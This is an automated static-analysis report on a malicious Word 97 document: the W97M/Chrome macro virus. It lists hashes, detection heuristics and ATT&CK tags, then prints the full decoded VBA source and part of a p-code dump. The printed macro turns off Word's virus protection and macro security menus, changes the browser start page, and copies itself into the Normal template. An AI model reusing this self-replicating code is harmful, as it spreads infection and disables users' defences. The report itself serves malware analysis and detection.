Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 2aa6c79b49ea19ef…

MALICIOUS

Office (OLE)

41.5 KB Created: 2000-08-09 13:58:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 3997d41fbdac45006922eb68c6a9b3f7 SHA-1: f7c1619397cae3fe66b38cfdda3fa586eabca8cd SHA-256: 2aa6c79b49ea19ef94d102ed3155cacb9633e81bacc948719577d28f81c2bc9c
182 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample contains a Document_Open macro and an Auto_Close macro, indicative of malicious intent. The VBA script attempts to disable security warnings and modify the Internet Explorer start page to 'http://codemonkey.cjb.net'. It also attempts to modify the document's VBA project, suggesting it may be a downloader or part of a larger attack chain.

Heuristics 6

  • ClamAV: Doc.Trojan.Chameleon-13 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Chameleon-13
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • Auto_Close macro high OLE_VBA_AUTOCLOSE
    Auto_Close macro
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://codemonkey.cjb.net In document text (OLE body)
    • http://www.geocities.com/sir_dystyk/index.htmlIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 8252 bytes
SHA-256: 679748df5b2700f68fa2c0d08c6a3a20089981eea059b9754c286566f4ba01fc
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
    On Error Resume Next
    If System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion", "MVP") <> "Enabled by Total Konfuzion" Then
        Randomize
        System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main", "Start Page") = "http://codemonkey.cjb.net"
        If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Security", "Level") <> "" Then
            CommandBars("Macro").Controls("Security...").Enabled = (Rnd * 0)
        Else
            CommandBars("Tools").Controls("Macro").Enabled = (Rnd * 0)
            CommandBars("Tools").Controls("Templates and Add-ins...").Enabled = (Rnd * 0)
            CommandBars("Format").Controls("Style Gallery...").Enabled = (Rnd * 0)
        End If
        With Options
            .VirusProtection = (Rnd * 0)
            .SaveNormalPrompt = (Rnd * 0)
            .ConfirmConversions = (Rnd * 0)
        End With
        With Application
            .EnableCancelKey = wdCancelDisabled
            .UserName = "Total Konfuzion"
            .UserInitials = "TK"
            .UserAddress = "W97M/Chrome"
        End With
        If ThisDocument = ActiveDocument Then Set i = NormalTemplate Else Set i = ActiveDocument
        Vx = ThisDocument.VBProject.VBComponents.Item(1).CodeModule.Lines(1, ThisDocument.VBProject.VBComponents.Item(1).CodeModule.CountOfLines)
        Set d = i.VBProject.VBComponents.Item(1).CodeModule
        d.DeleteLines 1, d.CountOfLines
        d.AddFromString Vx
        Chrome = "The day of the Chrome is comming...   >8)      "
        If Day(Now) <> "15" Then
            StatusBar = Chrome
            Application.Caption = Chrome
        End If
        If Day(Now) = "15" Then
            Application.Caption = Chrome
            With ActiveDocument.Shapes.AddShape(msoShapeSmileyFace, 220, 150, 150, 140).Fill
                .ForeColor.RGB = RGB(90, 90, 100)
                .BackColor.RGB = RGB(190, 211, 230)
                .TwoColorGradient msoGradientHorizontal, 1
            End With
        End If
        ActiveDocument.SaveAs FileName:=ActiveDocument.FullName, FileFormat:=wdFormatDocument
    End If
End Sub
Sub HelpAbout()
    MsgBox "W97M/Chrome" + vbCr + vbCr + "  -Total Konfuzion-", vbSystemModal, ">8)"
End Sub
Private Sub AutoClose()
    If Day(Now) = Minute(Now) Then MsgBox "The day of the Chrome is comming...   >8)", vbCritical + vbSystemModal, "W97M/Chrome"
End Sub


' Processing file: /opt/analyzer/scan_staging/65a8135b88fd42ae862b10a304dcf24f.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 10193 bytes
' Line #0:
' 	FuncDefn (Private Sub Document_Open())
' Line #1:
' 	OnError (Resume Next) 
' Line #2:
' 	LitStr 0x0000 ""
' 	LitStr 0x003C "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion"
' 	LitStr 0x0003 "MVP"
' 	Ld System 
' 	ArgsMemLd PrivateProfileString 0x0003 
' 	LitStr 0x001A "Enabled by Total Konfuzion"
' 	Ne 
' 	IfBlock 
' Line #3:
' 	ArgsCall Read 0x0000 
' Line #4:
' 	LitStr 0x0019 "http://codemonkey.cjb.net"
' 	LitStr 0x0000 ""
' 	LitStr 0x003B "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main"
' 	LitStr 0x000A "Start Page"
' 	Ld System 
' 	ArgsMemSt PrivateProfileString 0x0003 
' Line #5:
' 	LitStr 0x0000 ""
' 	LitStr 0x0038 "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Security"
' 	LitStr 0x0005 "Level"
' 	Ld System 
' 	ArgsMemLd PrivateProfileString 0x0003 
' 	LitStr 0x0000 ""
' 	Ne 
' 	IfBlock 
' Line #6:
' 	Ld Rnd 
' 	LitDI2 0x0000 
' 	Mul 
' 	Paren 
' 	LitStr 0x000B "Security..."
' 	LitStr 0x0005 "Macro"
' 	ArgsLd CommandBars 0x0001 
' 	ArgsMemLd Controls 0x0001 
' 	MemSt Enabled 
' Line #7:
' 	ElseBlo
... (truncated)